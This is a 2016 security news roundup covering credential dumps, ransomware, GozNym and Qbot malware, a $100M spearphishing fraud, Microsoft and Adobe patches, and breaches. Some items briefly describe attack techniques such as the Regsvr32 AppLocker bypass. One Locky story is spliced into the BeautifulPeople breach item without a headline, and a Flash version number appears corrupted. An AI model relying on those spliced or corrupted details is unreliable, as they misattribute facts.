News Stories (May-05-2016)
--World Password Day: resources to help you on this special occasion (May-04-2016)
The 5th of May is World Password Day, the ideal opportunity to raise awareness of passwords with your organisation's staff and senior management.
This is the fourth year passwords have been honoured in this way. The event recurs annually on the first Thursday of May.
To help, we have compiled a few quick resources to help you make the most of this auspicious occasion.
The World Password Day website: here you can test the security of passwords, read advice and even watch videos about the importance of password security (1075 views on Youtube!) https://passwordday.org/
And Billy Austin, VP of security at LOGICnow, has shared a few tips on password safety:
Consider a Password Manager to store and generate passwords. Password Managers help employees generate sophisticated & unique passwords for each login.
Change all default passwords on vendor provided devices and applications. The most obvious example we can all relate to is the home wireless router where Admin is the login and ‘Password' is the password.
Remove all account IDs and Passwords from terminated employees, avoiding unauthorized access. Today's plentitude of logins present a challenge to IT while attackers see this as a potential backdoor into the crown jewels - your data.
Intel has written a blog about the day: https://iq.intel.com/celebrate-world-password-day-2016/
It even has it's own hashtag on Twitter: https://twitter.com/hashtag/PasswordDay #PasswordDay
--Gmail, Yahoo email credentials among millions found on the dark web (May-04-2016)
Hold Security is reporting that one of its researchers discovered, and then acquired, a mega-size load of 272 million stolen email credentials from a hacker.
The security research firm said the batch came from a “Russian kid” that one of its analysts found who had gathered 1.17 billion stolen credentials, from Google, AOL, Yahoo and Mail.ru, from various places on the dark web. When Hold's team boiled this list down, comparing the newly acquired data to data already in its possession, it found 272 million of the email credentials were unique with 42.5 million having never been disclosed. The remainder were already known to be compromised.
In spite of the huge volume of records that were found, the price paid to the hacker by Hold Security is even more amazing.
The original asking price was 50 Rubles, less than $1, but Hold bargained the hacker down.
“In all reality, 50 rubles is next to nothing, but we refuse to contribute even insignificant amounts to his cause. It is rather funny to negotiate over this, but finally the hacker just asks us to add likes/votes to his social media page (so much for anonymity). That we can do, and once he is satisfied with the results we get a link to an incredible 10 gigabytes in a compressed database, which takes us more than hour to download,” Hold wrote.
Industry experts put forth several reasons for the hacker giving away the data, ranging from it being a supply and demand issue to the fact that they were unverified and thus possibly worthless to a buyer.
“My guess is the credentials were either unverified or specifically stale (abandoned accounts, for instance). He probably gathered it from dumps of previous breaches of other vendors, so it's likely that he didn't do the work of stealing the data so much as he probably just garbage-collected it from around the web,” Lysa Myers, Security Researcher at ESET told SCMagazine.com in an email.
Jonathan Cran at Bugcrowd said in an email to SCMagazine.com the emails could still prove useful, but “the half life of stolen credentials is decreasing as SaaS providers such as mail.ru or Gmail get faster at invalidating them.”
“These kind of mail credentials are useful for spammers and scammers who utilize accounts to spread malware and further their own access,” Myers pointed out.
--Mobile devices still vulnerable to attack, report (May-02-2016)
New mobile attacks can workaround two-factor authentication on Android phones and inject malware onto iOS phones, according to a blog post from Check Point reporting on demonstrations at BlackHat Asia.
Attackers, the post said, can push rogue apps to Android devices of any Google services user. These allow the miscreants to steal incoming text messages. This despite a security feature put in place to block this scheme, namely deactivating the app's broadcast receivers – an Android API – until the user first opens the app.
Hackers get around this defense by replacing a bookmark in the user's devices with a URL redirecting to malicious activity, so attackers bypass two-factor authentication (2FA) and have no need to activate the malware. And, because the attack is launched from a compromised PC browser, access to the device itself is not needed.
In the case of iOS devices, by creating their own spoofed hotspots, attackers can brick devices loaded with versions before 9.3 as these tools are programmed to connect automatically to known Wi-Fi hotspots. Once a iOS device is connected, it continually checks time and date settings via the Network Time Protocol servers. Attackers can brick the device by resetting the time to the 1.1.1970 (epoch zero), an old bug in iOS.
Another iOS vulnerability was demonstrated on non-jailbroken devices running uncertified code signed with a developer certificate. Using readily available open source tools, miscreants can install what appears to be a legitimate app, but in actuality has malware loaded in. When installed, the "bad" app will hide the icon of the legitimate app and so evade standard security protocols as well as dupe the user into accepting it.
The point, the Check Point researchers said, is to use advanced security solutions.
--New ransomware demands payment in iTunes, targets older Android software (Apr-26-2016)
A new malware type has been spotted in the wild that features a couple of original moves not seen yet by researchers; it is self installing and the cybercriminals require that the ransom be paid in iTunes gift cards.
Researchers at Blue Coat said the cybercriminals are using ELF, aka Towelroot, exploits along with some tools from the leaked Hacking Team exploit-kit inventory to spread Dogspectus ransomware. The download is achieved through malicious ads that are served onto the device through a series of redirections that usually start with a malvertising ad call, said Blue Coat researcher Andrew Brandt to SCMagazine.com in an email Tuesday.
What happens next caught Brandt by surprise. Instead of showing the usual “application permissions” dialog box that spurs the victim to act and thus download the malware, this malware simply installs itself.
“This is the first time, to my knowledge; an exploit kit has been able to successfully install malicious apps on a mobile device without any user interaction on the part of the victim,” Brandt wrote
Brandt noted that devices running newer versions of Chrome, downloaded properly from the Play market, do not appear vulnerable, while those running out of date 4.x variants are susceptible. Blue Coat is continuing its research to see if the malware successfully infects newer versions of Android.
The attacks are believed to have begun in February.
Once installed and ready to act the ransomware displays an iTunes graphic claiming the device has been locked by a supposed law enforcement group such as the “America national security agency” or “Nation security agency” with the demand for $200 to be paid using iTunes gift cards.
The device is not encrypted, just locked, and if connected to a computer photos, music and other files can be removed.
“Use of iTunes gift card codes is extremely unusual. Early ransomware asked for money transfers via Western Union moneygram, then they all switched over to Bitcoin. This is the first ransomware I've seen that asks for this specific type of gift card to be used for payment,” Brandt said.
--Info on 1.2M BeautifulPeople.com users sold on dark web after breach (Apr-26-2016)
The personal information of 1.2 million members of the “exclusive” dating site BeautifulPeople.com has surfaced for sale on the dark web following a breach that occurred last year.
Haveibeenpwned creator Troy Hunt spotted the information, including names, passwords, sexual orientations, beauty ratings, dates of birth, drinking habits, education levels, email addresses, income levels, job titles, and other data, according to haveibeenpwned.
BeautifulPeople.com told SCMagazine.com in an emailed statement that the information for sale is from the initial breach and only involves data that was provided by members prior to mid-July 2015.
“All impacted members are, of course, being notified once again,” the statement said.
MacKeeper Security Researcher Chris Vickery, who initially discovered the data on an exposed company server in December 2015, told SCMagazine.com via email comments that the information was unprotected and accessible by an IP address when he found it.
He said the dating website simply published an open database into the world that was accessible to anyone with the IP address.
“The malicious people that have been selling it probably found the very same server and downloaded it directly from BeautifulPeople,” he said.
The dating website said that they are only aware of two security researchers, presumably Hunt and Vickery, accessing the data when the breach was reported to them last year.
BeautifulPeople.com initially said only “test servers” were compromised, according to Wired, but Vickery suggested this was done only to make the breach sound “less severe.”
“The server may have indeed been a ‘test,' BUT they put real data into this ‘test' server,” Vickery said.
Threat actors are sending the malicious downloaders using malicious .zip and .rar files disguised as invoices, corporate documents, tax information, and other seemingly benign files in order to spread the new downloader.
The new downloader is written in "more compact" script coding that allows attackers to encrypt the malicious code into .zip or .rar files multiple times, InfoArmor's chief intelligence officer, Andrew Komarov, told SCMagazine.com
The malicious code bypasses anti-spam filters and anti-virus software through obfuscation, Komarov said.
Those behind the Locky malware didn't design the malicious downloaders but obtained them from a third party, he said, noting that 50 unique malicious downloaders can be purchased for between $1 to $25, making them an inexpensive way to spread the ransomware.
FireEye researchers observed the new downloader using a custom network communication protocol which in their, in their tests, only downloaded the Locky ransomware as its payload, according to an April 22 blog post.
The researchers went on to say that the downloader could be a new platform for installing other malware or for “pay-per-install” malware distribution.
--Report: Ransomware feeds off poor endpoint security (Apr-26-2016)
Poor endpoint security practices are only helping to propel the great ransomware epidemic of 2016—and if allowed to fester, this threat will spread to new vulnerable endpoints including IoT devices, cars and ICS and SCADA systems, according to a new report from the Institute for Critical Infrastructure Technology (ICIT).
The report, released last week, recommends adopting holistic endpoint security solutions—including signature-based and behavior-based anti-malware software, firewalls and intrusion detection and protection systems—as part of a multi-layered approach toward IT security. “Of the lines of network defense available to an organization, endpoint security is uniquely capable of stemming the growing ransomware menace,” the report reads.
ICIT warned that organizations become too easily disillusioned with endpoint solutions whenever they fail to thwart a systems breach within their industry. When this happens, security execs tend to look to bolster defenses elsewhere in the network.
In truth, however, endpoint security solutions remain a critical component of good IT fortification, just not by themselves, the report explains. “The biggest misconception of endpoint security is that it is the only solution needed. EPS is but one of the many pieces needed to reduce the potential of a system compromise,” Kevin Chalker, CEO of GRA Quantum, said in the report.
“The endpoint aspect is just a part of a layered security strategy; there's no silver bullet, although every time there's a big breach, charlatans come out of the woodwork selling a silver-bullet solution,” said James Scott, co-founder of and senior fellow at ICIT, in an interview with SCMagazine.com
Some organizations also eschew endpoint solutions because they falsely believe they don't have data worth stealing on their network, the report continues. But the beauty of ransomware is that the affected data doesn't have to hold value to the cybercriminal—it need only hold value to the impacted company that desperately needs access to it.
Ryan Brichant, CTO of ICS at FireEye, an ICIT fellow, posited in an interview with SCMagazine.com that endpoint security technology has been around for so long that “it's not the sexy security sell,” while Malcolm Harkins, global CISO at Cylance and also an ICIT fellow, told SCMagazine.com he thinks that IT execs view older, traditional endpoint solutions as products that “deteriorate the user experience.”
ICIT predicted that ransomware, if left unchecked, will continue to propagate in new ways. For instance, the report says it “seems likely” that by the beginning of the second half of 2016, there will be a notable public case of bad actors using ransomware as a decoy, distracting the victim's IT resources while secretly exfiltrating sensitive data from affected machines. In such a scenario, the valuable data is the true end game, while the ransom—if ever paid—is essentially a bonus. “A lot of times we're seeing chatter on dark web forums that the most sophisticated [cybercriminals] don't care about getting the ransom paid” in a case such as this, said Scott.
The report also foresees ransomware locking up industrial control and SCADA systems in the near future. (SCADA—or Supervisory Control and Data Acquisition—systems enable the remote monitoring and control of industrial processes.) These operations technology (OT) systems are particularly vulnerable, as they are generally antiquated, and thus not equipped to thwart the latest cutting-edge threats. The difference between IT systems and OT systems, said Brichant, is that while IT systems are vulnerable to zero-day threats, OT systems are susceptible to “zero-decade threats.”
“The chances of us already having had a [ransomware] attack on these infrastructures are high,” Brichant added. It's just a matter of whether or not the affected industrial organization is willing to divulge the attack.
“I'm surprised that hasn't happened yet, frankly,” added Harkins, also referring to a ransomware attack on an ICS or SCADA system.
The report also predicted future ransomware attacks on IoT devices and Internet-connected cars. “Let's say I've got an electric ignition and… now I can't start my car until I've paid in bitcoin,” he said, envisioning one possible ransomware scenario. “Or let's say I've got traditional keys, but the car uses a passcode or fob or my fingerprint to unlock the door.” A cybercriminal could theoretically take control of the locking mechanism and forbid entry until the ransom was paid, Harkins added.
--Microsoft vulnerability lets hackers bypass app whitelisting protections (Apr-25-2016)
A researcher has discovered a way for attackers to sneak remotely hosted, unauthorized applications—more specifically, COM (Component Object Model) objects—past Microsoft Windows' whitelisting security feature Applocker, by abusing the command-line utility Regsvr32.
Normally, Regsvr32 allows users to register Dynamic Link Library (DLL) files and ActiveX controls, but on his blog, Colorado-based researcher Casey Smith recently explained that hackers can place a malicious script block inside the registration tag, and then have Regsvr32 successfully execute the code. The trick works on the business editions of Windows 7 on up.
No administrator access is required to perform this workaround, and the process does not alter the system registry, making this vulnerability-based hack a difficult one to detect.
--Researcher find backdoor that accessed Facebook employee passwords (Apr-23-2016)
A Taiwan-based security researcher, known as "Orange Tsai," who was awarded a $10,000 bug bounty in February published a report detailing the exploits that led to his discovery of illicit code on a Facebook server.
A consultant at the security firm Devcore, Orange Tsai said he discovered malware that provided access to Facebook employee's passwords, which had been used by a remote attacker to gain access to employee emails and shared files.
The accessed information appears not to have compromised Facebook users. The researcher wrote that he noticed that Facebook's server used Accellion's web-based Secure File Transfer service, a web application that, while popular among large companies like Facebook, has previously been found to contain serious security issues.
This caught the researcher's attention, and led him to look for potential vulnerabilities in the file transfer application. He ultimately discovered several vulnerabilities, including a SQL injection flaw that enabled remote code execution. Accellion patched the vulnerability in February.
A member of Facebook's security group wrote on Hacker News that Facebook did not have full control of the software, so it was run isolated from systems that host the company's user data. “We do this precisely to have better security, wrote Reginaldo, the Facebook employee. “After incident response, we determined that the activity Orange detected was in fact from another researcher who participates in our bounty program.”
Once Orange Tsai gained access to Facebook's server, he explored the web server log files and noticed an unusual traffic pattern, which led to his discovery of the illicit code.
Reginaldo at Facebook continued, “After incident response, we determined that the activity Orange detected was in fact from another researcher who participates in our bounty program. Neither of them were able to compromise other parts of our infra-structure so, the way we see it, it's a double win: two competent researchers assessed the system, one of them reported what he found to us and got a good bounty, none of them were able to escalate access.”
The situation is reminiscent of another incident Facebook faced last year, in which the company claimed that security researcher Wesley Wineberg unethically exploited a flaw to escalate another vulnerability.
In speaking with SCMagazine.com, Wineberg, a security consultant at Synack, said, “This researcher did exactly what I did.” However, the company has since updated its policy to explicitly prohibit researchers from escalating exploits in this way.
Wineberg said he finds it encouraging to see that “they are changing how they deal with researchers.”
--Cytegic finds ties between terror and cyberattacks (Apr-20-2016)
The terror attacks that struck Belgium and France also kicked off a period of increased cyber attack activity in both countries, according to a report by Cytegic.
The research firm's March intelligence report confirmed the company's prediction that cyber attacks would rise in these nations. Cytegic found political activist groups, like Anonymous, were the most active, followed by nation-states and cyber-terrorists or those affiliated with ISIS.
The most targeted industries after the attacks were government, media, banking, finance, critical infrastructure and defense. Cytegic noted that after the Brussels' incident the primary actors were financial hackers, political activists, political cyber warriors and cyber terrorists. This was very similar to what happened after the November 2015 Paris incident.
“Our analysis not only confirmed our thesis regarding the effect the Brussels attacks had on the cyber-activity within Belgium, but it also revealed it resonated throughout the world, especially in North America,” Cytegic wrote.
--Report: Canada police decrypted a million BlackBerry messages (Apr-18-2016)
As part of its investigation into a 2011 murder, the Royal Canadian Mounted Police (RCMP) intercepted and decrypted around one million PIN-to-PIN BlackBerry messages, according to Vice News.
Court documents in the case revealed the extent of cooperation between BlackBerry Limited, formerly known as Research In Motion Limited, as well as telecommunications giant Rogers. The RCMP set up a server to intercept messages. BlackBerry's master key was then applied to decrypt the messages.
While the exact details of where the piece of code to decrypt messages originated, Crown prosecutors revealed the RCMP had access to the key since 2010. Lawyers for the government attempted in court for two years to prevent the information from becoming public.
While privacy advocates question the legal authority compelling service providers to cooperate with police in carrying out court orders, such as wiretaps and search warrants, it's unknown whether the RCMP maintains its surveillance capabilities.
--Report: Cybersecurity new atom bomb, says Apple co-founder Steve Wozniak (Apr-18-2016)
Cybersecurity is the greatest threat since the atom bomb, Apple co-founder Steve Wozniak said in an interview on the Australian TV news show Lateline.
And, he said, the threat is "getting worse and worse year by year."
In a wide-ranging interview, the man who in the early 1970s developed the first Apple computers with Steve Jobs, said, "Could they really take out our electrical system, turn off our internet?"
He also lamented the loss of privacy, saying the U.S. government's attempt to force Apple to decrypt the cell phone used by one of the San Bernardino killers was wrong.
"What if the FBI was able to go to any company any time they felt like it and said you have to build a product our way?" he said on Lateline.
Wozniak left his R&D role at Apple in the 1980s. He is now an adjunct professor at the University of Technology Sydney.
--Report: Feds staying mum on possible Firefox vulnerability (Apr-15-2016)
Experts are speculating that the FBI may be closely guarding a secret vulnerability in the Firefox browser that it can exploit for future law enforcement purposes, according to a Motherboard report yesterday.
The article refers to a network investigative technique that the FBI used to hack visitors of the Playpen child pornography website. That site runs on the encrypted Tor network, but an exploit that works on the Tor browser would also work just as effectively on Firefox, upon which Tor was built.
So far the U.S. Department of Justice has resisted a U.S. district court order to disclose the technique. In an interview with Motherboard, Christopher Soghoian, principal technologist at the American Civil Liberties Union (ACLU), said that by not disclosing the alleged vulnerability in such a popular global browser, “The government is essentially choosing to keep hundreds of millions of people vulnerable in case a few of them turn out to be criminals later.”
--The anatomy of a spearphishing scam, or how to steal $100M with a fake email (Apr-15-2016)
A lawsuit filed on April 14 by U.S. Attorney for the Southern District of New York Preet Bharra gives an insider's view on how frighteningly easy it is for a company to be duped out of a huge sum of money. In this case almost $100 million.
The civil forfeiture lawsuit was filed in federal court in New York City and is being brought on behalf of an unidentified American company that was suckered out of $98.9 million over a four-week period late last summer. Luckily, the majority of the money has already been recovered and this suit is specifically going after the remaining $25 million that is being held in at least 20 overseas banks, according to court documents.
“This is more than twice as large as any reported loss that we have seen,” Ryan Kalember, Proofpoint's vice president of Cybersecurity Strategy, told SCMagazine.com in an email Friday.
What this case perfectly illustrates is the step-by-step process a criminal can take implementing such a scam and all of the warnings that were ignored by the victim.
Considering the massive pile of money involved, the scheme itself was extremely simple and used by cybercriminals every day, albeit to normally steal smaller amounts of plain old data. It was a classic spearphishing attack.
According to Bharra's suit, the scam was initiated around Aug. 10, 2015, when the victimized company received an email purportedly from an Asian-based vendor with which it has frequently done business in the past. The email in question contained the name D Talan, AR and was not picked up not by the victim company itself. Instead it came to an email address set up and monitored by an outside firm hired by the victim to deal with its vendors and other payees.
The initial email from Talan simply asked for some background information regarding its billing history with the victim. This information was supplied on August 11 and then that same day a follow up email was received by the vendor's partner from Talan informing the company that the “vendor's” banking information would be changing and they wished to know who to contact at the victim company to make the change so any payments would go to the correct account. On August 17 Talan gave the victim's payment partner the new account information and it was placed into the victim's system.
Starting around August 21 the payment partner began sending a series of 16 payments to the new, fraudulent account, as part of its usual business. All appeared to be going well when on September 14 both the victim and its payment company received word from the real vendor that it had not received any payments starting August 22, or the day after Talan's account information was input into the system.
A quick investigation ensued and when Talan's email was studied it was quickly discovered to have several irregularities, including a @mail.md domain instead of the vendor's corporate domain name. In addition, it indicated that the domain was hosted in Moldova, far from the vendor's true location in Asia.
The final indicator that something was amiss was that the funds were deposited into a Eurobank facility in Cyprus, and not at a bank in the vendor's home nation.
If any of these indicators had been flagged from the start the entire scam would have been stopped in its tracks.
“Employees should be suspicious if they receive a request for unusual information or a wire transfer via email, even if it appears to come from a high-level executive. Check the reply-to email address and always call to confirm. If a vendor changes their wiring instructions over email, call them to confirm. If the CEO requests a significant transfer that is unusual, call him or her to confirm it. If the email header has a warning from your email security system, such as a subject like [BULK] or [SUSPICIOUS], then contact the vendor directly on the phone, do not enter the invoice for payment,” Kalember said.
A U.S. magistrate working with Eurobank quickly froze the Cypriot account stopping about $74 million of the stolen money from moving out.
This was an extremely lucky and somewhat rare occurrence as most wire transfers one completed are tough to reverse.
“Recovering money can be difficult if sent by wire. As the transaction may be irreversible within a short time window. There have been many variations of these scams in the past and they have been going on for some time. Luckily, international law enforcement has been taking note of these scams to better monitor, mitigate the financial losses and arrest the criminals responsible,” Terrence Gareau, chief scientist of Nexusguard, told SCMagazine.com in an email.
The victim was not so lucky with its remaining funds because the bad guys had almost immediately moved them from Eurobank and spread them around to 19 other banks to help duck authorities.
The court document did indicate that U.S. authorities know where those accounts are located with one being in Estonia.
--Facebook scam promises friend's video, delivers malware instead (Apr-14-2016)
A new spam campaign tries to fool Facebook users into downloading malware by luring them to a fake YouTube page supposedly featuring a friend's video.
According to a scam alert from research firm ESET, victims receive either a false notification that they were tagged in a friend's timeline post, or a message purportedly sent by a friend via Messenger.
Typically titled “My first video,” “My video,” or “Private video,” the fake message compels users to click on a link that sends them to the phony YouTube website. There, the user is instructed to install a plug-in to view the content—but it's actually malware that fills the victim's wall with fake videos and sends the same “My first video” messages to that person's friends, further propagating the threat.
To eliminate the threat, ESET advises victims to remove the plug-in, disguised as a “Make a GIF” app, from their browsers. Currently, the threat only impacts users of Google Chrome.
--New GozNym banking malware steals millions in just days (Apr-14-2016)
A new banking trojan named GozNym is actively hitting U.S. and Canadian banks and has already taken about $4 million from two dozen North American banks.
IBM's X-Force Research team reported that 24 banks in the two countries, 22 in the U.S., have so far lost about $4 million to attacks using GozNym since the malware was discovered earlier this month. Who conducted the attacks is not known.
Limor Kessem, executive security advisor for IBM, wrote in a blog that GozNym was created by combining some of the source code from the older Nymaim and Gozi IFSB banking malware to create an even more dangerous piece of software.
“From the Nymaim malware, it leverages the dropper's stealth and persistence; the Gozi ISFB parts add the banking Trojan's capabilities to facilitate fraud via infected Internet browsers," said Kessem. "The end result is a new banking Trojan in the wild.”
Attacks are so far pretty evenly split with business banks absorbing 28 percent of the attacks; credit unions, 27 percent; e-commerce 22 percent; retail banking, 17 percent; and the remaining six percent were in other types of institutions.
GozNym uses its native Nymaim ability to infiltrate its targets through an exploit kit which drops a payload into the system that uses two executables for the infection routine, IBM said.
Giovanni Vigna, co-founder and chief technology officer of Lastline, told SCMagazine.com in an email Thursday that malware like GozNym is to be expected now.
“While it is interesting to see two strands of malware becoming closely intertwined, it is not surprising. As for any software that has to be flexible and reliable, malware has been modularized for a while, so that functionality can be reused or loaded as-needed.
One industry executive said it was disappointing that GozNym has been successful because, while this malware is new, the type of attack has been seen before and the banking industry was told to beware.
“When you see an attack like GozNym picking up pieces of past malware to swipe another $4 million, it stings if you're a security professional. You know you told both IT and the business how they needed to react to attacks of this type when the original threats emerged. This just shows you that they didn't really listen then,” Jonathan Sander, vice president at Lieberman Software, told SCMagazine.com in an email Thursday.
Sanders described this lack of concern as similar to that of a home that constantly broken into through an open window because the owner refuses to remember to lock it.
--Patch Tuesday: Microsoft addresses Badlock Bug, issues 13 bulletins (Apr-12-2016)
Microsoft's April Patch Tuesday update contained 13 entries with six rated critical and the remaining seven, which includes a fix for the BadLock Bug, as important.
The bulletins, which address 31 specific vulnerabilities, all deal with problems that could result in remote code execution, elevation of privilege, denial of service or a security feature bypass if left unpatched.
The critical-rated bulletins are MS16-037, MS16-038, MS16-039, MS16-040, MS16-042 and MS16-050 with each potentially allowing remote code execution.
While the BadLock Bug grabbed many of the headlines on this Patch Tuesday, most industry insiders did not see it as Microsoft's most pressing problem.
“Although the bug on everyone's mind going into patch Tuesday has been BadLock, this should probably not be at the top of any patch priority index by a long shot. The top priority for Windows administrators should be to protect against vulnerabilities that can be exploited through web sites or documents. This means that IE/Edge, office, and graphics components should demand top attention especially since they all address flaws rated as more likely to be exploited, said Tripwire researcher Craig Young to SCMagazine.com in a Tuesday email.
Qualys CTO Wolfgang Kandek noted that this batch of patches fixes two zero-day threats, included in bulletin MS16-039.
“The two 0-days are contained with the Windows portion and both allow for the escalation of privilege from a normal user to administrator. In real life they will be paired with an exploit for a vulnerability that gets the attacker on the machine such as the Flash Player flaw from APSB16-10 that Microsoft addresses in MS16-050,” Kandek said to SCMagazine.com in an email.
MS16-042 also drew Kandek's attention. This bulletins address four issues in Office and, in addition to applying the patches, he suggested administrators ban RTF emails from Outlook.
Lane Thomas, of Tripwire's Vulnerability and Exposure Research Team, called out bulletin MS16-049, rated important, as one system administrators should closely examine.
“What makes this bulletin interesting is that it addresses a vulnerability found within the HTTP 2.0 protocol stack. HTTP 2.0 is a very new protocol and I have personally been waiting to see new vulnerabilities in its implementation,” Thomas said in an email to SCMagazine.com.
The final patch that garnered industry attention was MS16-050 which addressed vulnerabilitiesin Flash Player. Adobe also issued a patch.
--Report warns of self-propagating ransomware (Apr-12-2016)
Researchers at Cisco's Talos Security Intelligence and Research Group published a new report on the next phase of ransomware. Noting trends emerging among recent ransomware strains, the researchers expect to soon see a new era of self-propagating ransomware, or “cryptoworms.”
While ransomware strains have typically cast a wide net through mass phishing campaigns or similar methods, recent ransomware campaigns have employed more targeted strategies, specifically pursuing enterprise networks and healthcare institutions.
The Ransomware: Past, Present, and Future report, co-authored by Talos security outreach manager Craig Williams and manager of ICS research Joe Marshall, referenced an earlier Talos study of SamSam ransomware's propagation method; the ransomware infects entire servers, and then spreads across networks. In speaking with SCMagazine.com, Joe Marshall, security research manager at Talos said, “SamSam is the proof of ransomware's evolution to its logical next step.”
Talos security outreach manager Craig Williams noted that SamSam was designed to be “effectively hands-free,” but said the fact that its creators chose to take advantage of two well-known network vulnerabilities – one of the vulnerabilities is nine years old and the other is seven years old – shows that ransomware can get far more sophisticated.
“We believe that this is a harbinger of what's to come -- a portent for the future of ransomware,” theRansomware: Past, Present, and Future report stated.
The researchers reported rising ransom prices, citing estimates that Angler exploit kit operators generate $60 million per year in ransom payloads, but warned that “Ransomware operators are increasing the stakes.”
This figure stands in stark contrast to earlier figures. A section chief at the FBI's Cyber Division said 2,453 ransomware attacks were reported in 2015, costing the victims $24.1 million.
Recent attacks targeting healthcare facilities, such as the reported ransomware incident that took Medstar Health offline last month, are demanding larger payouts. Attacks like these prompted the U.S. Department of Homeland Security (DHS), in collaboration with Canadian Cyber Incident Response Centre (CCIRC) to issue a ransomware alert.
“It's almost child's play. You only have to spin them up, and let them go,” said Marshall. “There's a plethora of the vectors the ransomware can utilize.”
Last month, researchers discovered a new version of TeslaCrypt ransomware, featuring stronger encryption algorithms and an ability to extract more data from computer files.
Williams said they have confirmed that ransomware victims are not consistently getting the keys that they purchase and said victims cannot always trust the integrity of the data they get back. “It's astonishing to me that paying the ransom is still being encouraged as a magical quick fix solution for business owners,” he said.
--Cyberattack glitch exposes new strain of Qbot malware (Apr-12-2016)
The malware Qbot relies on stealth to secretly steal victims' credentials, but an unexpected glitch during a recent cyberattack alerted researchers to a new campaign featuring a more virulent strain of the software.
According to a white paper and corresponding release, BAE Systems discovered a new variant of Qbot — the original dates back to 2009 — featuring significant modifications to avoid detection, including:
polymorphic code that disguises Qbot's coding signatures
automated updates that generate new encrypted versions every six hours to outpace software updates
the ability to identify sandbox environments to thwart malware researchers
BAE determined the Qbot variant has infected more than 54,000 PCs globally. However, the plot was uncovered when the malware caused several Windows XP-based computers at a public sector organization to crash. "The criminals tripped up because a small number of outdated PCs were causing the malicious code to crash them, rather than infect them,” said Adrian Nish, BAE's head of cyber threat intelligence in a company statement.
--Adobe updates Flash Player patching active zero-day vulnerability (Apr-08-2016)
Adobe issued an update to Flash Player Thursday night to fix an active zero-day vulnerability, along with several other critical issues.
This is the second month in a row that Adobe has had to roll out an out of schedule update to fix an active flaw in Flash Player. The update covers 24 vulnerabilities with one, CVE-2016-1019, known to be actively exploited on systems running Windows 10 and earlier with Flash Player version 126.96.36.1996 and earlier.
The CVE-2016-1019 vulnerability was spotted in the Magnitude Exploit Kit by Proofpoint researcher Kafeine and is capable of allowing remote code execution. In a lucky twist Proofpoint noted that while the new exploit could theoretically work on any version of Flash only older versions had been targeted.
“In other words, equipped with a weapon that could pierce even the latest armor, they only used it against old armor, and in doing so exposed to security researchers a previously unreported vulnerability. We refer to this type of faulty implementation as a “degraded” mode, and it is something that we have observed in the past with CVE-2014-8439 and CVE-2015-0310 in Angler,” Kafeine wrote.
The problems affect Windows, Macintosh, Chrome and Linux. Adobe announced on April 5 that it would issue the patch and recommends anyone using Flash upgrade to the latest version as soon as possible.
--Pros examine Mossack Fonseca breach: WordPress plugin, Drupal likely suspects (Apr-08-2016)
Nearly a week after the Panamanian law firm Mossack Fonseca sent an alert to the firm's ultra high-net-worth clients announcing that the firm's email server was breached, a cybersecurity executive says his firm has pieced together the details of how the breach of 2.6 terabytes of confidential documents may have occurred.
Mossack Fonseca's main website currently runs an outdated version of Revolution Slider, a WordPress plugin that could grant a remote attacker a shell on the web server, said Feedjit CEO Mark Maunder, in speaking with SCMagazine.com.
Maunder said his team assessed Mossack Fonseca's IP history and discovered that the firm's website IP was on the same network as its mail servers. The law firm's website was wide open until a month ago and would have been “trivially easy” to exploit, he wrote on Wordfence.com, in a security update. Wordfence is a WordPress security plugin produced by Feedjit. The update also mentioned that the law firm's web portal accessed by clients reportedly used a vulnerable version of Drupal.
An industry source told SCMagazine.com that Mossack Fonseca's website is “riddled with unpatched vulnerabilities.”
Emil Eifrem, CEO of Neo Technology, told SCMagazine.com that a vulnerability of this magnitude goes against “basic IT operations.” Eifrem's firm created the graph database used by the International Consortium of Investigative Journalists (ICIJ) to organize the documents contained in the Panama Papers that were exfiltrate from Mossack Fonseca. If the mail servers were on the same network, it would imply the firm did not “have the fundamentals in place,” he said.
David Gibson, vice president of strategy and market development at Varonis, told SCMagazine.com, the idea that files were downloaded internally seems unlikely. “This doesn't seem like mining normal user mailboxes to me. If that is the case, then it shows how glaringly weak the detective capabilities,” he said.
“Clearly they are not security-conscious, because there was a gaping hole,” said Maunder. “It's unlikely that they have intrusion protections in place.”
--Cybersecurity being overlooked by American universities: Report (Apr-07-2016)
CloudPassage released a report today slamming the U.S. university system for failing to give cybersecurity a higher profile in its computer science and engineering programs.
CloudPassage found that not one of the top 10 computer science programs in the country, as listed by U.S. News & World Report in 2015, require a single cybersecurity course in order to graduate. Of the top 36 programs only University of Michigan, which is ranked 12th, has such a requirement.
“With more than 200,000 open cybersecurity jobs in 2015 in the U.S. alone and the number of threat surfaces exponentially increasing, there's a growing skills gap between the bad actors and the good guys,” said Robert Thomas, CEO of CloudPassage, told SCMagazine.com in an emailed statement.
Thomas cited several reasons why cybersecurity is not getting its fair share of university and graduate students. The first issue is cybersecurity has become a specialty with students only focusing on this topic when they look to obtain a masters degree or post graduate certification, but not enough grads are doing so. The reason why might be hard for schools and the industry to overcome.
“Frankly, cybersecurity isn't perceived the same way as building flashy apps. Demand for people with undergraduate CS or IS degrees is off the charts, so it's easy to see why many prefer to start working, earning money and building a career that way,” he said.
The situation is so bad that only one of the 121 schools the report studied, the University of Alabama, required three or more cybersecurity classes to graduate.
“Perhaps more surprising is that none of the top 10 U.S. computer science programs we looked at require a cybersecurity course for graduation,” he said.
--ETA hacking group member pleads guilty to DDoS against security researcher (Apr-07-2016)
Benjamin Earnest Nichols, a 37-year-old man from Oklahoma City, faces a 10-year federal prison sentence for launching a DDoS attack against the website owned by a security researcher.
Nichols pleaded guilty to causing the transmission of a program or code to a protected computer under the Computer Fraud and Abuse Act (CFAA). He was a member of the hacker group Electronik Tribulation Army (ETA), according to a statement released by the FBI.
Nichols's DDoS attack against the website mcgrewsecurity.com caused its owner, security researcher Wesley McGrew, $5,000 to $6,500 in damages over the course of a year. In addition to the DDoS attack, Nichols admitted to harassing the researcher by setting up a fake website under McGrew's name and he posted photo-shopped images of McGrew, ordered sex toys to his home, and used an internet relay chat bot to spew profane insults at McGrew.
Nichols has not been sentenced yet and a sentencing date is not scheduled yet.
The hacking group's leader Jesse McGraw, aka GhostExodus, was sentenced to nine years in federal prison for planting malicious code on remote-controlled computers at a medical center.
--U.S., Canada issue ransomware alert (Apr-05-2016)
With a new ransomware incidents popping up almost on a daily basis, the U.S. Department of Homeland Security (DHS), in collaboration with Canadian Cyber Incident Response Centre (CCIRC), have issued an official ransomware alert.
While the alert intended to educate the general population to the threat and how to combat becoming a victim it also recommends to not pay the ransom.
